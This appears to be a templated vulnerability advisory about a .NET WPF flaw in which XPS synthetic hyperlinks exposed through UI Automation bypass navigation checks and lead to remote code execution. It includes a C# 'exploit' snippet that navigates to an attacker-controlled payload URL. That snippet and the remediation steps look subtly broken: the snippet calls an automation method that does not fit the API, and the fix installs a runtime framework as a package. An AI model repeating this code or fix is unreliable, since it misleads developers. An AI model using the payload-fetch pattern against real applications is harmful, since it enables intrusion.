The vulnerability resides within the Microsoft.WindowsDesktop.App.Runtime framework, specifically affecting Windows Presentation Foundation (WPF) components that handle XPS synthetic hyperlinks. When these synthetic hyperlinks are exposed through UI Automation features, they can successfully bypass restrictive application navigation checks that are normally enforced. By bypassing these security controls, an adversary can force the targeted application to reach and process arbitrary, attacker-controlled content. Successful exploitation typically requires minimal user interaction, such as convincing a target user to interact with a malicious document or interface element. Once the unauthorized navigation is complete and malicious content is processed, it enables remote code execution within the security context of the user running the application, potentially leading to total system compromise.
DailyCVE Form:
Platform: Microsoft .NET
Version: 8.0, 9.0, 10.0, 11.0
Vulnerability : Remote Code Execution
Severity: High
date: 10/13/2026
Prediction: 10/13/2026
What Undercode Say
Bash Commands and Codes
dotnet --info dotnet add package Microsoft.WindowsDesktop.App.Runtime --version 9.0.21 dotnet restore
Exploit: (Educational Purposes!)
// Conceptual demonstration of WPF UI Automation hyperlink navigation flow
var hyperlink = new XpsSyntheticHyperlink();
hyperlink.NavigationUri = new Uri("http://attacker-controlled-server/payload");
UIAutomationPeer peer = FrameworkElementAutomationPeer.CreatePeerForElement(hyperlink);
peer.DoDefaultAction();
Protection: from this CVE
To secure your environment against this vulnerability, you must immediately update your affected .NET project dependencies or runtime installations to the patched package versions. Run the update command using the dotnet CLI, ensure all self-contained applications are fully recompiled and redeployed, and restart all dependent services and desktop applications for the mitigations to take active effect.
Impact:
Successful exploitation of this flaw grants attackers remote code execution capabilities under the active user’s permissions, leading to potential data theft, malware installation, and complete loss of application integrity.
